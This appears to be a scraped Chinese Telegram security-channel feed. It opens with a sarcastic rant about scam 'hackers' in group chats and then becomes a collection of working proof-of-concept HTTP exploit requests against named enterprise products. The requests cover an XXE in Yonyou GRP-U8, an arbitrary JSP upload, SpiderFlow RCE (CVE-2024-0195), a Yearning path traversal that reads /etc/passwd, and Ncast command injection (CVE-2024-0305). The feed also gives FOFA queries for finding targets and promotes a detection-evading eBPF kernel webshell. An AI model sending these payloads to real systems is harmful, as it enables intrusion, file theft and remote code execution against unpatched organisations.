原始tg圈钱带嗨阔套路总结,符合以下条件的基本上可以直接避雷
首先是在群聊中桀骜不驯,自我描述中天花板技术人设,时不时就出来发一句又拿了一个购物站/刚刚日了个包网/出xxx大库/出xxx通杀0day。然后圈钱广告和简介为实力团队/一手xxx/口嗨勿扰/骗测傻逼滚/中介勿扰
具体的技术讨论不发一言(他掺和不上),一遇到笼统总结性的发言的时候他就跳出来开始装了,比如“不就是waf吗我都绕了好多个了”,“之前也打过几个这样的站”,“这个站我有全库直接拿0day打”,“刚刚又拿了一个大型国企的内网”,“之前打gov的时候”,巴拉巴拉,头像也一般是最经典的黑色背景,兜帽男,匿名者面具,kali的logo等等,非常的黑客
然后你问他两句技术问题就会破防,先百度搜几个词报菜名,被点破过后就会开始说自己专注实战,稍微好一点的这个时候会拿出几张传得包浆的cms后台图片或者花里胡哨的命令行截图,自己日过一堆xxxx,不懂理论但是👴🏻反正就是能日站。让他具体发点战绩,比如挂个黑页发个权限 黑客就开始红温了,无外乎什么傻逼傻屌脑残玩意死妈东西脑子有包操你妈你妈死了等等,特别急眼,上窜下跳,总是能让大家突然释怀的笑🤓
最后阶段这个时候黑客被拷打得有点受不了了就会找借口逃逸,经典话术为“懂的都懂”,“反正我就是牛逼你觉得我不牛逼就是你不行,你是傻逼”,“已经被老板盘口包养了,不差你这点钱”,“懒得跟你这种傻逼浪费时间”,“跟你这种废物扯拉低我身价”,然后以一副世外高人黑客天花板的懒得搭理凡夫俗子的姿态光速退场。然后隔两天你就发现“时间很紧”的带黑客又在隔壁不知道哪个群聊起天来了🤣
首先是在群聊中桀骜不驯,自我描述中天花板技术人设,时不时就出来发一句又拿了一个购物站/刚刚日了个包网/出xxx大库/出xxx通杀0day。然后圈钱广告和简介为实力团队/一手xxx/口嗨勿扰/骗测傻逼滚/中介勿扰
具体的技术讨论不发一言(他掺和不上),一遇到笼统总结性的发言的时候他就跳出来开始装了,比如“不就是waf吗我都绕了好多个了”,“之前也打过几个这样的站”,“这个站我有全库直接拿0day打”,“刚刚又拿了一个大型国企的内网”,“之前打gov的时候”,巴拉巴拉,头像也一般是最经典的黑色背景,兜帽男,匿名者面具,kali的logo等等,非常的黑客
然后你问他两句技术问题就会破防,先百度搜几个词报菜名,被点破过后就会开始说自己专注实战,稍微好一点的这个时候会拿出几张传得包浆的cms后台图片或者花里胡哨的命令行截图,自己日过一堆xxxx,不懂理论但是👴🏻反正就是能日站。让他具体发点战绩,比如挂个黑页发个权限 黑客就开始红温了,无外乎什么傻逼傻屌脑残玩意死妈东西脑子有包操你妈你妈死了等等,特别急眼,上窜下跳,总是能让大家突然释怀的笑🤓
最后阶段这个时候黑客被拷打得有点受不了了就会找借口逃逸,经典话术为“懂的都懂”,“反正我就是牛逼你觉得我不牛逼就是你不行,你是傻逼”,“已经被老板盘口包养了,不差你这点钱”,“懒得跟你这种傻逼浪费时间”,“跟你这种废物扯拉低我身价”,然后以一副世外高人黑客天花板的懒得搭理凡夫俗子的姿态光速退场。然后隔两天你就发现“时间很紧”的带黑客又在隔壁不知道哪个群聊起天来了🤣
😁6👍4👏2🤣2
用友GRP-U8 ufgovbank XXE漏洞
app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1Host: 192.168.40.130:222User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Connection: closeContent-Length: 161Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipreqData=<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
在dnslog平台看到访问记录则存在漏洞
app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1Host: 192.168.40.130:222User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Connection: closeContent-Length: 161Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipreqData=<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
在dnslog平台看到访问记录则存在漏洞
用友移动管理平台uploadIcon任意文件上传漏洞
POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 184Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWSL-CE-SUID: 15------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="file"; filename="c0fig.jsp"<% out.println("123");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--
响应包中显示了上传后的文件路径
POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 184Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWSL-CE-SUID: 15------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="file"; filename="c0fig.jsp"<% out.println("123");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--
响应包中显示了上传后的文件路径
👍1
SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195)
POST /function/save HTTP/1.1Host: 192.168.40.130:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 121Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestid=1&name=cmd¶meter=rce&noscript=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
dns平台收到ping请求记录则说明存在漏洞
POST /function/save HTTP/1.1Host: 192.168.40.130:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 121Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestid=1&name=cmd¶meter=rce&noscript=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
dns平台收到ping请求记录则说明存在漏洞
Yearning front 任意文件读取漏洞
app="Yearning"
GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1Host: your-ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate
app="Yearning"
GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1Host: your-ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate
新型内核马
无进程、无端口、无文件(注入后文件可删除)执行命令不会新建shell进程,无法通过常规行为检测
将WebShell注入内核,无法通过常规内存检测可改造内核马,适配HTTP协议以外的所有协议
通过ebpf hook入/出口流量,筛选出特定的恶意命令。再通过hook execve等函数,将其他进程正常执行的命令替换为恶意命令,达到WebShell的效果
项目地址:https://github.com/veo/ebpf_shell
无进程、无端口、无文件(注入后文件可删除)执行命令不会新建shell进程,无法通过常规行为检测
将WebShell注入内核,无法通过常规内存检测可改造内核马,适配HTTP协议以外的所有协议
通过ebpf hook入/出口流量,筛选出特定的恶意命令。再通过hook execve等函数,将其他进程正常执行的命令替换为恶意命令,达到WebShell的效果
项目地址:https://github.com/veo/ebpf_shell
GitHub
GitHub - veo/ebpf_shell: ebpf WebShell/内核马,一种新型内核马/WebShell技术
ebpf WebShell/内核马,一种新型内核马/WebShell技术. Contribute to veo/ebpf_shell development by creating an account on GitHub.
CVE-2024-0305 Ncast盈可视高清智能录播系统busiFacade RCE漏洞
app="Ncast-产品" && noscript=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1Host: 192.168.40.130:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 154Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
app="Ncast-产品" && noscript=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1Host: 192.168.40.130:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 154Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
